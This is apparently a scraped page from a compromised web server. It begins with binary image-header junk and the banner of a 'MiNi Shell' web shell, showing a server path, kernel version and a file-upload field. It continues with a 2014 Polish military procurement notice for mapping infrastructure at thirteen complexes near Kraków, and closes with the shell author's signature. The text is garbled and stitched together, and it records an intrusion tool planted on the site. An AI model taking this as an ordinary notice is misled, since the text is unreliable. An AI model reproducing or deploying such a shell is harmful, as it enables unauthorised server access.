JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140722/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140722/244150-N-2014.html

<p class="kh_header"><b>Kraków: Przeprowadzenia uaktualnienia i uszczegółowienia dokumentacji graficznej infrastruktury naziemnej oraz terenów zielonych w trzynastu kompleksach wojskowych zlokalizowanych na terenie województwa małopolskiego                                  w m. Krakowie, gm. Słomniki oraz gm. Kłaj. 
Sygn. 44/INFR/14.</b><br>
<b>Numer ogłoszenia: 244150 - 2014; data zamieszczenia: 22.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 3811 , Rząska, ul. Krakowska 2, 30-901 Kraków, woj. małopolskie, tel. +48 12 4555059; 4555116, faks +48 12 4555059, +48 12 4555103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.35wog.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenia uaktualnienia i uszczegółowienia dokumentacji graficznej infrastruktury naziemnej oraz terenów zielonych w trzynastu kompleksach wojskowych zlokalizowanych na terenie województwa małopolskiego                                  w m. Krakowie, gm. Słomniki oraz gm. Kłaj. 
Sygn. 44/INFR/14..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  wykonanie uaktualnienia oraz dokonanie uszczegółowienia dokumentacji graficznej infrastruktury naziemnej oraz terenów zielonych 
w oparciu o materiały istniejące dla kompleksów wojskowych zlokalizowanych                                  w:  m. Niedźwiedź gm. Słomniki, m. Kłaj gm. Kłaj,  Krakowie ul. Skrzatów 2, Krakowie                            ul. Wrocławska 82, Krakowie ul. Mogilska 85, Krakowie ul. Montelupich 3, Krakowie                         ul. Rakowicka 29, Krakowie ul. Odrowąża 7, Krakowie ul. Ułanów 43, Krakowie ul. Rakowickiej 22, Krakowie ul. Wrocławskiej 21, Krakowie-Pasterniku, Rząsce ul. Krakowska 2 wraz                           z opisaniem występujących elementów infrastrukturalnych.

Miejscem realizacji przedmiotu zamówienia są tereny zamknięte w rozumieniu art. 4 ust.2a ustawy Prawo geodezyjne i kartograficzne (Dz. U.  z 1989 Nr 30, poz.163 z późn. zm.).

W ramach przedmiotu zamówienia należy zaktualizować istniejące opracowania graficzne w tym:
a)	dokonać  aktualizacji  z zaznaczeniem usytuowania występującej infrastruktury technicznej naziemnej tj. obiektów, placów, dróg, chodników, ogrodzeń;
b)	dokonać  aktualizacji  z zaznaczeniem usytuowania występujących terenów zielonych 
(szaty roślinnej) tj. terenów zadrzewionych, terenów zakrzewionych, żywopłotów, trawników, klombów itd.;
c)	poszczególne elementy należy zwymiarować oraz opisać w układzie tabelarycznym 
(z dokonaniem podziału na występujące rodzaje oraz typy).

Prace inwentaryzacyjne obejmują obszary o łącznej pow. 533,1211 ha położonych                          w kompleksach wojskowych:
a)	Niedźwiedź o pow. 40,6407 ha w tym: tereny zurbanizowane ok. 12,1922 ha, 
tereny zielone ok 28,4485 ha;
b)	Kłaj o pow. 209,58240 ha w tym: tereny zurbanizowane ok. 31,4286 ha, 
tereny zielone ok 178,0954 ha;
c)	Kraków ul. Skrzatów 2 o pow. 6,6419 ha w tym: tereny zurbanizowane ok. 3,3210 ha, 
tereny zielone ok. 3,3209 ha;
d)	Kraków ul. Wrocławska 82 o pow. 27,2419 ha w tym: tereny zurbanizowane ok. 20,4314 ha, tereny zielone ok. 6,8105 ha;
e)	Kraków ul. Mogilska 85 o pow. 1,7071 ha w tym: tereny zurbanizowane ok. 1,5364 ha, 
tereny zielone ok. 0,1707 ha;
f)	Kraków ul. Montelupich 3 o pow. 3,7465 ha w tym: tereny zurbanizowane ok. 3,3719 ha, tereny zielone ok. 0,3746 ha;
g)	Kraków ul. Rakowicka 29  o pow. 5,7637 ha w tym: tereny zurbanizowane ok. 4,6110 ha, tereny zielone ok. 1,1527 ha;
h)	Kraków ul. Odrowąża 7 o pow. 0,4952 ha w tym: tereny zurbanizowane ok. 0,3466 ha, 
tereny zielone ok. 0,1486 ha;
i)	Kraków ul. Ułanów 43 o pow. 17,3448 ha w tym: tereny zurbanizowane ok. 8,6724 ha, 
tereny zielone ok. 8,6724 ha;
j)	Kraków ul. Rakowicka 22 o pow. 1,3806 ha w tym: tereny zurbanizowane ok. 1,1045 ha, tereny zielone ok. 0,2761 ha;
k)	Kraków ul. Wrocławska 21 o pow. 0,8939 ha w tym: tereny zurbanizowane ok. 0,7598 ha, tereny zielone ok. 0,1341 ha;
l)	Kraków-Pasternik o pow. 197,3808 ha w tym: tereny zurbanizowane ok. 19,7381 ha, tereny zielone ok. 177,6427 ha;
m)	Rząska ul. Krakowska 2 o pow. 20,3600 ha w tym: tereny zurbanizowane ok. 8,1440 ha, tereny zielone ok. 12,2160 ha;

Szczegółowy zakres wykonania zamówienia:
1.	Zamawiający dla celów prowadzenia prac umożliwi pozyskanie opracowań graficznych kompleksów z wrysowaną istniejącą infrastrukturą techniczną oraz terenami zielonymi                 (w pliku elektronicznym DxF oraz mapy wywiadu terenowego w wersji papierowej w skali 1:1000 lub 1:5000). O pozyskanie map należy wystąpić do Rejonowego Zarządu Infrastruktury w Krakowie ul. Mogilska 85 - Ośrodka Dokumentacji Budownictwa Wojskowego - w formie pisemnej (załącznik nr 2 do Specyfikacji Technicznej); 
2.	Wykonawca winien dokonywać graficznej aktualizacji map na podstawie wizji lokalnej 
i bezpośrednich pomiarów w terenie;
3.	Szczegółowy opis sposobu wykonania zadania określa Specyfikacja istotnych warunków zamówienia;
4.	Potwierdzenie wykonanie zamówienia stanowić będą uaktualnione i uszczegółowione 
o występujące obiekty infrastruktury i tereny zielone, opracowanie graficzne  kompleksów wraz z dokumentacją pomocniczą tj. tabelami inwentaryzacyjnymi - złożone                                  u Zamawiającego w formie elektronicznej oraz  w formie wydruku papierowego;
5.	Przed przekazaniem dokumentacji powykonawczej Zamawiającemu, wszelkie występujące zmiany na opracowaniach graficznych, należy uzgodnić z Rejonowym Zarządem Infrastruktury w Krakowie ul. Mogilska 85 - Ośrodkiem Dokumentacji Budownictwa Wojskowego   i uzyskać pozytywną, pisemną opinię;
6.	Opracowania graficzne z naniesionymi zmianami powinny być dostosowane do odczytu                  w programie Mikro - Map oraz Briscad - w.3. z możliwością operowania poszczególnymi warstwami tj. tereny zadrzewione, zakrzewione, place, drogi itd. Szczegółowy opis wykonywania rzutów inwentaryzacyjnych zawiera Specyfikacja Techniczna;
7.	Dokumentacja pomocnicza - tabele inwentaryzacyjne powinny być wykonane w arkuszu kalkulacyjnym z zastosowaniem formuł obliczeniowych, z rozszerzeniem *xls.  Szczegółowy opis przygotowania dokumentacji pomocniczej określono w załączniku nr 4 do Specyfikacji Technicznej);
8.	Forma elektroniczna winna być utrwalona na nośnikach danych (płyty CD lub DVD), oddzielna płyta dla każdego kompleksu nieruchomości; 
9.	Formę papierową (dla części graficznej w formacie arkusza A0 na papierze 
o zwiększonej grubości typu kartonowego, dla części opisowej w formacie arkusza A4 ), stanowią 3 egzemplarze każdego kompletu dokumentacji - dla poszczególnych kompleksów z osobnymi warstwami infrastruktury i terenów zielonych.

Szczegółowy opis przedmiotu zamówienia  stanowi załącznik nr 11 do SIWZ.

Proponuje się oferentom przeprowadzenie na własny koszt i ryzyko wizji lokalnej 
w celu uzyskania wszelkich informacji koniecznych do przygotowania ofert. Termin wizji lokalnej i szczegóły techniczne jej przeprowadzenia wymagają uzgodnienia 
z Zamawiającym pod nr tel. 12 455 51 22 p. Markiem Luzarem, pod nr tel. 12 455 30 30 p. Anetą Filipczyk - Wydział Infrastruktury.

Zamawiający po otrzymaniu pisemnego wniosku na fax: +48 (12) 455 51 65  o dokonanie wizji lokalnej na wybranym obiekcie zamieści na dwa dni przed jej dokonaniem na stronie internetowej informację zawierającą jej termin i godzinę (z ustalonego  i zamieszczonego na stronie terminu może skorzystać każdy zainteresowany Wykonawca)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2000 zł (słownie zł: dwa tysiące)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznaczył szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada niezbędną do wykonania zamówienia wiedzę i doświadczenie, do oferty należy dołączyć następujące dokumenty: 
a)	Zamawiający uzna, iż Wykonawca spełnia warunek udziału w postępowaniu jeśli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
co najmniej dwie usługi na kwotę 20 000,00 zł każda (dwadzieścia tysięcy złotych) polegające na wykonaniu dokumentacji geodezyjnej, z podaniem ich wartości, przedmiotu realizacji usług, dat wykonania i podmiotów, na rzecz których te usługi zostały wykonane (załącznik nr 10 do SIWZ).
b)	Do wykazu wykonanych lub wykonywanych usług Wykonawca musi dołączyć dowody (poświadczenia) potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie. W odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert.
c)	Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać ww. poświadczeń to składa oświadczenie zawarte w załączniku              nr 8 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznaczył szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna, że Wykonawca spełnia powyższy warunek udziału                             w postępowaniu jeśli wykaże, że będzie posiadał:
co najmniej jedną osobę posiadającą uprawnienia geodezyjne, zgodnie  z art. 43 ustawy z dnia 17.V.1989 r. Prawo Geodezyjne i Kartograficzne (Dz. U. 2010 Nr 193 poz. 1287 z późn. zm.) w co najmniej jednym                             z następujących zakresów:
1.	geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne lub;
2.	rozgraniczenie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych lub;
3.	geodezyjne pomiary podstawowe lub;
4.	geodezyjna obsługa inwestycji.
b)	Wykonawca w celu potwierdzenia, że jest w stanie zabezpieczyć wykonywanie przedmiotu zamówienia wykaże w załączniku złożonym do oferty (zał. nr 13 do SIWZ) personel posiadający wymagane przez Zamawiającego kwalifikacje.
c)	Wykonawca zobowiązany jest do przedłożenia Zamawiającemu najpóźniej w dniu podpisania umowy oryginałów dokumentów lub kopii poświadczonych za zgodność
 z oryginałem, stwierdzających nadanie odpowiednich uprawnień osoby wskazanej w zał. nr 13 do SIWZ.
        Zamawiający określając wymagania w zakresie posiadania ww. uprawnień geodezyjnych dopuszcza odpowiadające im uprawnienia, wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA),  z zastrzeżeniem przepisów Ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznaczył szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W celu potwierdzenia, że Wykonawca posiada niezbędną do wykonania zamówienia wiedzę i doświadczenie, do oferty należy dołączyć następujące dokumenty: 
a)	Zamawiający uzna, iż Wykonawca spełnia warunek udziału w postępowaniu jeśli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
co najmniej dwie usługi na kwotę 20 000,00 zł każda (dwadzieścia tysięcy złotych) polegające na wykonaniu dokumentacji geodezyjnej, z podaniem ich wartości, przedmiotu realizacji usług, dat wykonania i podmiotów, na rzecz których te usługi zostały wykonane (załącznik nr 10 do SIWZ).
b)	Do wykazu wykonanych lub wykonywanych usług Wykonawca musi dołączyć dowody (poświadczenia) potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie. W odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert.
c)	Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać ww. poświadczeń to składa oświadczenie zawarte w załączniku              nr 8 do SIWZ.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.35wog.mil.pl/przetargi-rok/2014<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 3811
			ul. Krakowska 2, Rząska
			woj. małopolskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2014 godzina 10:00, miejsce: Jednostka Wojskowa 3811
ul. Krakowska 2, Rząska
30-901 Kraków
 Kancelaria jawna, budynek nr 1, pokój nr 120 (piętro I) w godzinach 8.00 - 11.00 i 13.00 - 15.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com